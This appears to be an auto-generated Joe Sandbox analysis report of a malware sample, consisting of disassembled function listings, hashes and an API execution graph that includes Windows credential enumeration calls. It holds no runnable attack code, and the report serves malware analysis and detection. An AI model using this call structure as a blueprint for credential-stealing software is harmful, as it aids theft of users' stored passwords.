                                                              • Instruction Fuzzy Hash: 5631BE32A0022AABDF249F64CC82EFF7BB5EB50610F0401ACED05DB190E735D955CBA0
                                                              Function 23D7C7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(23D7C7DD), ref: 23D7C7E6
                                                              • GetModuleHandleA.KERNEL32(?,23D7C7DD), ref: 23D7C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 23D7C860
                                                                • Part of subcall function 23D7C803: GetProcAddress.KERNEL32(00000000,23D7C7F4), ref: 23D7C804
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-0
                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction ID: 40b1734703b0a128f2915cbd87d12dbb3280c12bce388158786fe97369b54df6
                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction Fuzzy Hash: EC01DE01A453413CFB2166B40C01EAA6FFC9B27A60B181FDEE24097193DAA0C606C3BA
                                                              Function 23D75CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23D71D66,00000000,00000000,?,23D75C88,23D71D66,00000000,00000000,00000000,?,23D75E85,00000006,FlsSetValue), ref: 23D75D13
                                                              • GetLastError.KERNEL32(?,23D75C88,23D71D66,00000000,00000000,00000000,?,23D75E85,00000006,FlsSetValue,23D7E190,FlsSetValue,00000000,00000364,?,23D75BC8), ref: 23D75D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23D75C88,23D71D66,00000000,00000000,00000000,?,23D75E85,00000006,FlsSetValue,23D7E190,FlsSetValue,00000000), ref: 23D75D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 6b0c1c911387ee0fd269b8ea11f8ed77fb319d89566183b17decec9f6af5b62b
                                                              • Instruction ID: 98006758a9fc50804a3c873277063a13ecd7f9b1045b6aa3ff8ac9101db98335
                                                              • Opcode Fuzzy Hash: 6b0c1c911387ee0fd269b8ea11f8ed77fb319d89566183b17decec9f6af5b62b
                                                              • Instruction Fuzzy Hash: CC012637611232ABC7116A78CC4DE8637AEEF45BB1B140669FA0AE7180E734D911CAE1
                                                              Function 23D716AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction ID: c42080aa2fff7d3775e9da226b9c1df64be4c464b2db83e114cc24a307c456f8
                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction Fuzzy Hash: 6F11E771E00388AECB11DFA8D841BDDFBFDEF19614F14409AE545E7212E6705B02C765
                                                              Function 23D71EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 23D72903
                                                                • Part of subcall function 23D735D2: RaiseException.KERNEL32(?,?,?,23D72925,00000000,00000000,00000000,?,?,?,?,?,23D72925,?,23D821B8), ref: 23D73632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 23D72920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 16bb91e9d3cf61e43af21355cacac1406d3a3d57219f77b8a4e061a40af23cc7
                                                              • Instruction ID: cd16ea4e59a5fc9a2805aa6376766ebd2d1849ecacec3dc2d1ca793e9ccd6f45
                                                              • Opcode Fuzzy Hash: 16bb91e9d3cf61e43af21355cacac1406d3a3d57219f77b8a4e061a40af23cc7
                                                              • Instruction Fuzzy Hash: C3F0A434A1034D77CB14B6A5EC84B9E77BC9B11650BA041EDEA6496091EB31EB1A85E0

                                                              Execution Graph

                                                              Execution Coverage:6.2%
                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:77
                                                              execution_graph 40191 441819 40194 430737 40191->40194 40193 441825 40195 430756 40194->40195 40196 43076d 40194->40196 40197 430774 40195->40197 40198 43075f 40195->40198 40196->40193 40209 43034a memcpy 40197->40209 40208 4169a7 11 API calls 40198->40208 40201 4307ce 40202 430819 memset 40201->40202 40210 415b2c 11 API calls 40201->40210 40202->40196 40204 43077e 40204->40196 40204->40201 40206 4307fa 40204->40206 40205 4307e9 40205->40196 40205->40202 40211 4169a7 11 API calls 40206->40211 40208->40196 40209->40204 40210->40205 40211->40196 37538 442ec6 19 API calls 37712 4152c6 malloc 37713 4152e2 37712->37713 37714 4152ef 37712->37714 37716 416760 11 API calls 37714->37716 37716->37713 37717 4466f4 37736 446904 37717->37736 37719 446700 GetModuleHandleA 37722 446710 __set_app_type __p__fmode __p__commode 37719->37722 37721 4467a4 37723 4467ac __setusermatherr 37721->37723 37724 4467b8 37721->37724 37722->37721 37723->37724 37737 4468f0 _controlfp 37724->37737 37726 4467bd _initterm __wgetmainargs _initterm 37727 44681e GetStartupInfoW 37726->37727 37728 446810 37726->37728 37730 446866 GetModuleHandleA 37727->37730 37738 41276d 37730->37738 37734 446896 exit 37735 44689d _cexit 37734->37735 37735->37728 37736->37719 37737->37726 37739 41277d 37738->37739 37781 4044a4 LoadLibraryW 37739->37781 37741 412785 37742 412789 37741->37742 37789 414b81 37741->37789 37742->37734 37742->37735 37745 4127c8 37795 412465 memset ??2@YAPAXI 37745->37795 37747 4127ea 37807 40ac21 37747->37807 37752 412813 37825 40dd07 memset 37752->37825 37753 412827 37830 40db69 memset 37753->37830 37756 412822 37851 4125b6 ??3@YAXPAX 37756->37851 37758 40ada2 _wcsicmp 37759 41283d 37758->37759 37759->37756 37762 412863 CoInitialize 37759->37762 37835 41268e 37759->37835 37855 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37762->37855 37764 41296f 37857 40b633 37764->37857 37769 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37773 412957 37769->37773 37778 4128ca 37769->37778 37773->37756 37774 4128d0 TranslateAcceleratorW 37775 412941 GetMessageW 37774->37775 37774->37778 37775->37773 37775->37774 37776 412909 IsDialogMessageW 37776->37775 37776->37778 37777 4128fd IsDialogMessageW 37777->37775 37777->37776 37778->37774 37778->37776 37778->37777 37779 41292b TranslateMessage DispatchMessageW 37778->37779 37780 41291f IsDialogMessageW 37778->37780 37779->37775 37780->37775 37780->37779 37782 4044f7 37781->37782 37783 4044cf GetProcAddress 37781->37783 37787 404507 MessageBoxW 37782->37787 37788 40451e 37782->37788 37784 4044e8 FreeLibrary 37783->37784 37785 4044df 37783->37785 37784->37782 37786 4044f3 37784->37786 37785->37784 37786->37782 37787->37741 37788->37741 37790 414b8a 37789->37790 37791 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37789->37791 37861 40a804 memset 37790->37861 37791->37745 37794 414b9e GetProcAddress 37794->37791 37796 4124e0 37795->37796 37797 412505 ??2@YAPAXI 37796->37797 37798 41251c 37797->37798 37800 412521 37797->37800 37883 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37798->37883 37872 444722 37800->37872 37806 41259b wcscpy 37806->37747 37888 40b1ab ??3@YAXPAX ??3@YAXPAX 37807->37888 37809 40ac5c 37812 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37809->37812 37813 40ad4b 37809->37813 37815 40ace7 ??3@YAXPAX 37809->37815 37820 40ad76 37809->37820 37892 40a8d0 37809->37892 37904 4099f4 37809->37904 37812->37809 37813->37820 37912 40a9ce 37813->37912 37815->37809 37819 40a8d0 7 API calls 37819->37820 37889 40aa04 37820->37889 37821 40ada2 37822 40adc9 37821->37822 37823 40adaa 37821->37823 37822->37752 37822->37753 37823->37822 37824 40adb3 _wcsicmp 37823->37824 37824->37822 37824->37823 37917 40dce0 37825->37917 37827 40dd3a GetModuleHandleW 37922 40dba7 37827->37922 37831 40dce0 3 API calls 37830->37831 37832 40db99 37831->37832 37994 40dae1 37832->37994 38008 402f3a 37835->38008 37837 412766 37837->37756 37837->37762 37838 4126d3 _wcsicmp 37839 4126a8 37838->37839 37839->37837 37839->37838 37841 41270a 37839->37841 38042 4125f8 7 API calls 37839->38042 37841->37837 38011 411ac5 37841->38011 37852 4125da 37851->37852 37853 4125f0 37852->37853 37854 4125e6 DeleteObject 37852->37854 37856 40b1ab ??3@YAXPAX ??3@YAXPAX 37853->37856 37854->37853 37855->37769 37856->37764 37858 40b640 37857->37858 37859 40b639 ??3@YAXPAX 37857->37859 37860 40b1ab ??3@YAXPAX ??3@YAXPAX 37858->37860 37859->37858 37860->37742 37862 40a83b GetSystemDirectoryW 37861->37862 37863 40a84c wcscpy 37861->37863 37862->37863 37868 409719 wcslen 37863->37868 37866 40a881 LoadLibraryW 37867 40a886 37866->37867 37867->37791 37867->37794 37869 409724 37868->37869 37870 409739 wcscat LoadLibraryW 37868->37870 37869->37870 37871 40972c wcscat 37869->37871 37870->37866 37870->37867 37871->37870 37873 444732 37872->37873 37874 444728 DeleteObject 37872->37874 37884 409cc3 37873->37884 37874->37873 37876 412551 37877 4010f9 37876->37877 37878 401130 37877->37878 37879 401134 GetModuleHandleW LoadIconW 37878->37879 37880 401107 wcsncat 37878->37880 37881 40a7be 37879->37881 37880->37878 37882 40a7d2 37881->37882 37882->37806 37882->37882 37883->37800 37887 409bfd memset wcscpy 37884->37887 37886 409cdb CreateFontIndirectW 37886->37876 37887->37886 37888->37809 37890 40aa14 37889->37890 37891 40aa0a ??3@YAXPAX 37889->37891 37890->37821 37891->37890 37893 40a8eb 37892->37893 37894 40a8df wcslen 37892->37894 37895 40a906 ??3@YAXPAX 37893->37895 37896 40a90f 37893->37896 37894->37893 37897 40a919 37895->37897 37898 4099f4 3 API calls 37896->37898 37899 40a932 37897->37899 37900 40a929 ??3@YAXPAX 37897->37900 37898->37897 37901 4099f4 3 API calls 37899->37901 37902 40a93e memcpy 37900->37902 37903 40a93d 37901->37903 37902->37809 37903->37902 37905 409a41 37904->37905 37906 4099fb 37904->37906 37905->37809 37906->37906 37907 409a0a malloc 37906->37907 37908 409a37 37907->37908 37909 409a1c 37907->37909 37908->37809 37910 409a30 ??3@YAXPAX 37909->37910 37911 409a20 memcpy 37909->37911 37910->37908 37911->37910 37913 40a9e7 37912->37913 37914 40a9dc ??3@YAXPAX 37912->37914 37916 4099f4 3 API calls 37913->37916 37915 40a9f2 37914->37915 37915->37819 37916->37915 37941 409bca GetModuleFileNameW 37917->37941 37919 40dce6 wcsrchr 37920 40dcf5 37919->37920 37921 40dcf9 wcscat 37919->37921 37920->37921 37921->37827 37942 44db70 37922->37942 37926 40dbfd 37945 4447d9 37926->37945 37929 40dc34 wcscpy wcscpy 37971 40d6f5 37929->37971 37930 40dc1f wcscpy 37930->37929 37933 40d6f5 3 API calls 37934 40dc73 37933->37934 37935 40d6f5 3 API calls 37934->37935 37936 40dc89 37935->37936 37937 40d6f5 3 API calls 37936->37937 37938 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37937->37938 37977 40da80 37938->37977 37941->37919 37943 40dbb4 memset memset 37942->37943 37944 409bca GetModuleFileNameW 37943->37944 37944->37926 37947 4447f4 37945->37947 37946 40dc1b 37946->37929 37946->37930 37947->37946 37948 444807 ??2@YAPAXI 37947->37948 37949 44481f 37948->37949 37950 444873 _snwprintf 37949->37950 37951 4448ab wcscpy 37949->37951 37984 44474a 8 API calls 37950->37984 37953 4448bb 37951->37953 37985 44474a 8 API calls 37953->37985 37955 4448a7 37955->37951 37955->37953 37956 4448cd 37986 44474a 8 API calls 37956->37986 37958 4448e2 37987 44474a 8 API calls 37958->37987 37960 4448f7 37988 44474a 8 API calls 37960->37988 37962 44490c 37989 44474a 8 API calls 37962->37989 37964 444921 37990 44474a 8 API calls 37964->37990 37966 444936 37991 44474a 8 API calls 37966->37991 37968 44494b 37992 44474a 8 API calls 37968->37992 37970 444960 ??3@YAXPAX 37970->37946 37972 44db70 37971->37972 37973 40d702 memset GetPrivateProfileStringW 37972->37973 37974 40d752 37973->37974 37975 40d75c WritePrivateProfileStringW 37973->37975 37974->37975 37976 40d758 37974->37976 37975->37976 37976->37933 37978 44db70 37977->37978 37979 40da8d memset 37978->37979 37980 40daac LoadStringW 37979->37980 37981 40dac6 37980->37981 37981->37980 37983 40dade 37981->37983 37993 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37981->37993 37983->37756 37984->37955 37985->37956 37986->37958 37987->37960 37988->37962 37989->37964 37990->37966 37991->37968 37992->37970 37993->37981 38004 409b98 GetFileAttributesW 37994->38004 37996 40daea 37997 40db63 37996->37997 37998 40daef wcscpy wcscpy GetPrivateProfileIntW 37996->37998 37997->37758 38005 40d65d GetPrivateProfileStringW 37998->38005 38000 40db3e 38006 40d65d GetPrivateProfileStringW 38000->38006 38002 40db4f 38007 40d65d GetPrivateProfileStringW 38002->38007 38004->37996 38005->38000 38006->38002 38007->37997 38043 40eaff 38008->38043 38012 411ae2 memset 38011->38012 38013 411b8f 38011->38013 38083 409bca GetModuleFileNameW 38012->38083 38025 411a8b 38013->38025 38015 411b0a wcsrchr 38016 411b22 wcscat 38015->38016 38017 411b1f 38015->38017 38084 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38016->38084 38017->38016 38019 411b67 38085 402afb 38019->38085 38023 411b7f 38141 40ea13 SendMessageW memset SendMessageW 38023->38141 38026 402afb 27 API calls 38025->38026 38027 411ac0 38026->38027 38028 4110dc 38027->38028 38029 41113e 38028->38029 38034 4110f0 38028->38034 38166 40969c LoadCursorW SetCursor 38029->38166 38031 411143 38167 4032b4 38031->38167 38185 444a54 38031->38185 38032 4110f7 _wcsicmp 38032->38034 38033 411157 38035 40ada2 _wcsicmp 38033->38035 38034->38029 38034->38032 38188 410c46 10 API calls 38034->38188 38038 411167 38035->38038 38036 4111af 38038->38036 38039 4111a6 qsort 38038->38039 38039->38036 38042->37839 38044 40eb10 38043->38044 38056 40e8e0 38044->38056 38047 40eb6c memcpy memcpy 38051 40ebb7 38047->38051 38048 40ebf2 ??2@YAPAXI ??2@YAPAXI 38050 40ec2e ??2@YAPAXI 38048->38050 38053 40ec65 38048->38053 38049 40d134 16 API calls 38049->38051 38050->38053 38051->38047 38051->38048 38051->38049 38053->38053 38066 40ea7f 38053->38066 38055 402f49 38055->37839 38057 40e8f2 38056->38057 38058 40e8eb ??3@YAXPAX 38056->38058 38059 40e900 38057->38059 38060 40e8f9 ??3@YAXPAX 38057->38060 38058->38057 38061 40e911 38059->38061 38062 40e90a ??3@YAXPAX 38059->38062 38060->38059 38063 40e931 ??2@YAPAXI ??2@YAPAXI 38061->38063 38064 40e921 ??3@YAXPAX 38061->38064 38065 40e92a ??3@YAXPAX 38061->38065 38062->38061 38063->38047 38064->38065 38065->38063 38067 40aa04 ??3@YAXPAX 38066->38067 38068 40ea88 38067->38068 38069 40aa04 ??3@YAXPAX 38068->38069 38070 40ea90 38069->38070 38071 40aa04 ??3@YAXPAX 38070->38071 38072 40ea98 38071->38072 38073 40aa04 ??3@YAXPAX 38072->38073 38074 40eaa0 38073->38074 38075 40a9ce 4 API calls 38074->38075 38076 40eab3 38075->38076 38077 40a9ce 4 API calls 38076->38077 38078 40eabd 38077->38078 38079 40a9ce 4 API calls 38078->38079 38080 40eac7 38079->38080 38081 40a9ce 4 API calls 38080->38081 38082 40ead1 38081->38082 38082->38055 38083->38015 38084->38019 38142 40b2cc 38085->38142 38087 402b0a 38088 40b2cc 27 API calls 38087->38088 38089 402b23 38088->38089 38090 40b2cc 27 API calls 38089->38090 38091 402b3a 38090->38091 38092 40b2cc 27 API calls 38091->38092 38093 402b54 38092->38093 38094 40b2cc 27 API calls 38093->38094 38095 402b6b 38094->38095 38096 40b2cc 27 API calls 38095->38096 38097 402b82 38096->38097 38098 40b2cc 27 API calls 38097->38098 38099 402b99 38098->38099 38100 40b2cc 27 API calls 38099->38100 38101 402bb0 38100->38101 38102 40b2cc 27 API calls 38101->38102 38103 402bc7 38102->38103 38104 40b2cc 27 API calls 38103->38104 38105 402bde 38104->38105 38106 40b2cc 27 API calls 38105->38106 38107 402bf5 38106->38107 38108 40b2cc 27 API calls 38107->38108 38109 402c0c 38108->38109 38110 40b2cc 27 API calls 38109->38110 38111 402c23 38110->38111 38112 40b2cc 27 API calls 38111->38112 38113 402c3a 38112->38113 38114 40b2cc 27 API calls 38113->38114 38115 402c51 38114->38115 38116 40b2cc 27 API calls 38115->38116 38117 402c68 38116->38117 38118 40b2cc 27 API calls 38117->38118 38119 402c7f 38118->38119 38120 40b2cc 27 API calls 38119->38120 38121 402c99 38120->38121 38122 40b2cc 27 API calls 38121->38122 38123 402cb3 38122->38123 38124 40b2cc 27 API calls 38123->38124 38125 402cd5 38124->38125 38126 40b2cc 27 API calls 38125->38126 38127 402cf0 38126->38127 38128 40b2cc 27 API calls 38127->38128 38129 402d0b 38128->38129 38130 40b2cc 27 API calls 38129->38130 38131 402d26 38130->38131 38132 40b2cc 27 API calls 38131->38132 38133 402d3e 38132->38133 38134 40b2cc 27 API calls 38133->38134 38135 402d59 38134->38135 38136 40b2cc 27 API calls 38135->38136 38137 402d78 38136->38137 38138 40b2cc 27 API calls 38137->38138 38139 402d93 38138->38139 38140 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38139->38140 38140->38023 38141->38013 38145 40b58d 38142->38145 38144 40b2d1 38144->38087 38146 40b5a4 GetModuleHandleW FindResourceW 38145->38146 38147 40b62e 38145->38147 38148 40b5c2 LoadResource 38146->38148 38150 40b5e7 38146->38150 38147->38144 38149 40b5d0 SizeofResource LockResource 38148->38149 38148->38150 38149->38150 38150->38147 38158 40afcf 38150->38158 38152 40b608 memcpy 38161 40b4d3 memcpy 38152->38161 38154 40b61e 38162 40b3c1 18 API calls 38154->38162 38156 40b626 38163 40b04b 38156->38163 38159 40b04b ??3@YAXPAX 38158->38159 38160 40afd7 ??2@YAPAXI 38159->38160 38160->38152 38161->38154 38162->38156 38164 40b051 ??3@YAXPAX 38163->38164 38165 40b05f 38163->38165 38164->38165 38165->38147 38166->38031 38168 4032c4 38167->38168 38169 40b633 ??3@YAXPAX 38168->38169 38170 403316 38169->38170 38189 44553b 38170->38189 38174 403480 38385 40368c 15 API calls 38174->38385 38176 403489 38177 40b633 ??3@YAXPAX 38176->38177 38178 403495 38177->38178 38178->38033 38179 4033a9 memset memcpy 38180 4033ec wcscmp 38179->38180 38181 40333c 38179->38181 38180->38181 38181->38174 38181->38179 38181->38180 38383 4028e7 11 API calls 38181->38383 38384 40f508 6 API calls 38181->38384 38183 403421 _wcsicmp 38183->38181 38186 444a64 FreeLibrary 38185->38186 38187 444a83 38185->38187 38186->38187 38187->38033 38188->38034 38190 445548 38189->38190 38191 445599 38190->38191 38386 40c768 38190->38386 38192 4455a8 memset 38191->38192 38333 4457f2 38191->38333 38469 403988 38192->38469 38198 4455e5 38202 445672 38198->38202 38220 44560f 38198->38220 38200 445854 38201 4458aa 38200->38201 38594 403c9c memset memset memset memset memset 38200->38594 38203 44594a 38201->38203 38204 4458bb memset memset 38201->38204 38480 403fbe memset memset memset memset memset 38202->38480 38206 4459ed 38203->38206 38207 44595e memset memset 38203->38207 38208 414c2e 16 API calls 38204->38208 38210 445a00 memset memset 38206->38210 38211 445b22 38206->38211 38212 414c2e 16 API calls 38207->38212 38213 4458f9 38208->38213 38617 414c2e 38210->38617 38221 445bca 38211->38221 38222 445b38 memset memset memset 38211->38222 38218 44599c 38212->38218 38219 40b2cc 27 API calls 38213->38219 38214 44558c 38453 444b06 38214->38453 38227 40b2cc 27 API calls 38218->38227 38228 445909 38219->38228 38230 4087b3 338 API calls 38220->38230 38229 445c8b memset memset 38221->38229 38283 445cf0 38221->38283 38233 445bd4 38222->38233 38234 445b98 38222->38234 38223 445849 38681 40b1ab ??3@YAXPAX ??3@YAXPAX 38223->38681 38244 4459ac 38227->38244 38241 409d1f 6 API calls 38228->38241 38245 414c2e 16 API calls 38229->38245 38242 445621 38230->38242 38231 44557a 38231->38214 38666 41366b FreeLibrary 38231->38666 38232 44589f 38682 40b1ab ??3@YAXPAX ??3@YAXPAX 38232->38682 38239 414c2e 16 API calls 38233->38239 38234->38233 38235 445ba2 38234->38235 38754 4099c6 wcslen 38235->38754 38236 4456b2 38669 40b1ab ??3@YAXPAX ??3@YAXPAX 38236->38669 38237 40b2cc 27 API calls 38249 445a4f 38237->38249 38251 445be2 38239->38251 38240 403335 38382 4452e5 45 API calls 38240->38382 38254 445919 38241->38254 38667 4454bf 20 API calls 38242->38667 38243 445823 38243->38223 38263 4087b3 338 API calls 38243->38263 38255 409d1f 6 API calls 38244->38255 38256 445cc9 38245->38256 38247 445879 38247->38232 38267 4087b3 338 API calls 38247->38267 38632 409d1f wcslen wcslen 38249->38632 38261 40b2cc 27 API calls 38251->38261 38252 445d3d 38280 40b2cc 27 API calls 38252->38280 38253 445d88 memset memset memset 38264 414c2e 16 API calls 38253->38264 38683 409b98 GetFileAttributesW 38254->38683 38265 4459bc 38255->38265 38257 409d1f 6 API calls 38256->38257 38266 445ce1 38257->38266 38258 445bb3 38757 445403 memset 38258->38757 38259 445680 38259->38236 38503 4087b3 memset 38259->38503 38270 445bf3 38261->38270 38263->38243 38273 445dde 38264->38273 38750 409b98 GetFileAttributesW 38265->38750 38774 409b98 GetFileAttributesW 38266->38774 38267->38247 38279 409d1f 6 API calls 38270->38279 38271 445928 38271->38203 38684 40b6ef 38271->38684 38281 40b2cc 27 API calls 38273->38281 38278 40b2cc 27 API calls 38285 445a94 38278->38285 38287 445c07 38279->38287 38288 445d54 _wcsicmp 38280->38288 38291 445def 38281->38291 38282 4459cb 38282->38206 38292 40b6ef 253 API calls 38282->38292 38283->38240 38283->38252 38283->38253 38284 445389 259 API calls 38284->38221 38637 40ae18 38285->38637 38286 44566d 38286->38333 38554 413d4c 38286->38554 38295 445389 259 API calls 38287->38295 38296 445d71 38288->38296 38359 445d67 38288->38359 38290 445665 38668 40b1ab ??3@YAXPAX ??3@YAXPAX 38290->38668 38297 409d1f 6 API calls 38291->38297 38292->38206 38300 445c17 38295->38300 38775 445093 23 API calls 38296->38775 38303 445e03 38297->38303 38299 4456d8 38305 40b2cc 27 API calls 38299->38305 38306 40b2cc 27 API calls 38300->38306 38302 44563c 38302->38290 38308 4087b3 338 API calls 38302->38308 38776 409b98 GetFileAttributesW 38303->38776 38304 40b6ef 253 API calls 38304->38240 38310 4456e2 38305->38310 38311 445c23 38306->38311 38307 445d83 38307->38240 38308->38302 38670 413fa6 _wcsicmp _wcsicmp 38310->38670 38315 409d1f 6 API calls 38311->38315 38313 445e12 38319 445e6b 38313->38319 38320 40b2cc 27 API calls 38313->38320 38317 445c37 38315->38317 38316 4456eb 38323 4456fd memset memset memset memset 38316->38323 38324 4457ea 38316->38324 38325 445389 259 API calls 38317->38325 38318 445b17 38751 40aebe 38318->38751 38778 445093 23 API calls 38319->38778 38327 445e33 38320->38327 38671 409c70 wcscpy wcsrchr 38323->38671 38674 413d29 38324->38674 38331 445c47 38325->38331 38332 409d1f 6 API calls 38327->38332 38329 445e7e 38334 445f67 38329->38334 38337 40b2cc 27 API calls 38331->38337 38338 445e47 38332->38338 38333->38200 38571 403e2d memset memset memset memset memset 38333->38571 38339 40b2cc 27 API calls 38334->38339 38335 445ab2 memset 38340 40b2cc 27 API calls 38335->38340 38342 445c53 38337->38342 38777 409b98 GetFileAttributesW 38338->38777 38344 445f73 38339->38344 38345 445aa1 38340->38345 38341 409c70 2 API calls 38346 44577e 38341->38346 38347 409d1f 6 API calls 38342->38347 38349 409d1f 6 API calls 38344->38349 38345->38318 38345->38335 38350 409d1f 6 API calls 38345->38350 38644 40add4 38345->38644 38649 445389 38345->38649 38658 40ae51 38345->38658 38351 409c70 2 API calls 38346->38351 38352 445c67 38347->38352 38348 445e56 38348->38319 38356 445e83 memset 38348->38356 38353 445f87 38349->38353 38350->38345 38354 44578d 38351->38354 38355 445389 259 API calls 38352->38355 38781 409b98 GetFileAttributesW 38353->38781 38354->38324 38361 40b2cc 27 API calls 38354->38361 38355->38221 38360 40b2cc 27 API calls 38356->38360 38359->38240 38359->38304 38362 445eab 38360->38362 38363 4457a8 38361->38363 38364 409d1f 6 API calls 38362->38364 38365 409d1f 6 API calls 38363->38365 38366 445ebf 38364->38366 38367 4457b8 38365->38367 38368 40ae18 9 API calls 38366->38368 38673 409b98 GetFileAttributesW 38367->38673 38373 445ef5 38368->38373 38370 4457c7 38370->38324 38371 4087b3 338 API calls 38370->38371 38371->38324 38372 40ae51 9 API calls 38372->38373 38373->38372 38374 445f5c 38373->38374 38376 40add4 2 API calls 38373->38376 38377 40b2cc 27 API calls 38373->38377 38378 409d1f 6 API calls 38373->38378 38380 445f3a 38373->38380 38779 409b98 GetFileAttributesW 38373->38779 38375 40aebe FindClose 38374->38375 38375->38334 38376->38373 38377->38373 38378->38373 38780 445093 23 API calls 38380->38780 38382->38181 38383->38183 38384->38181 38385->38176 38387 40c775 38386->38387 38782 40b1ab ??3@YAXPAX ??3@YAXPAX 38387->38782 38389 40c788 38783 40b1ab ??3@YAXPAX ??3@YAXPAX 38389->38783 38391 40c790 38784 40b1ab ??3@YAXPAX ??3@YAXPAX 38391->38784 38393 40c798 38394 40aa04 ??3@YAXPAX 38393->38394 38395 40c7a0 38394->38395 38785 40c274 memset 38395->38785 38400 40a8ab 9 API calls 38401 40c7c3 38400->38401 38402 40a8ab 9 API calls 38401->38402 38403 40c7d0 38402->38403 38814 40c3c3 38403->38814 38407 40c877 38416 40bdb0 38407->38416 38408 40c86c 38856 4053fe 39 API calls 38408->38856 38414 40c7e5 38414->38407 38414->38408 38415 40c634 50 API calls 38414->38415 38839 40a706 38414->38839 38415->38414 39024 404363 38416->39024 38419 40bf5d 39044 40440c 38419->39044 38421 40bdee 38421->38419 38424 40b2cc 27 API calls 38421->38424 38422 40bddf CredEnumerateW 38422->38421 38425 40be02 wcslen 38424->38425 38425->38419 38432 40be1e 38425->38432 38426 40be26 _wcsncoll 38426->38432 38429 40be7d memset 38430 40bea7 memcpy 38429->38430 38429->38432 38431 40bf11 wcschr 38430->38431 38430->38432 38431->38432 38432->38419 38432->38426 38432->38429 38432->38430 38432->38431 38433 40b2cc 27 API calls 38432->38433 38435 40bf43 LocalFree 38432->38435 39047 40bd5d 28 API calls 38432->39047 39048 404423 38432->39048 38434 40bef6 _wcsnicmp 38433->38434 38434->38431 38434->38432 38435->38432 38436 4135f7 39063 4135e0 38436->39063 38439 40b2cc 27 API calls 38440 41360d 38439->38440 38441 40a804 8 API calls 38440->38441 38442 413613 38441->38442 38443 41361b 38442->38443 38444 41363e 38442->38444 38445 40b273 27 API calls 38443->38445 38446 4135e0 FreeLibrary 38444->38446 38447 413625 GetProcAddress 38445->38447 38448 413643 38446->38448 38447->38444 38449 413648 38447->38449 38448->38231 38450 413658 38449->38450 38451 4135e0 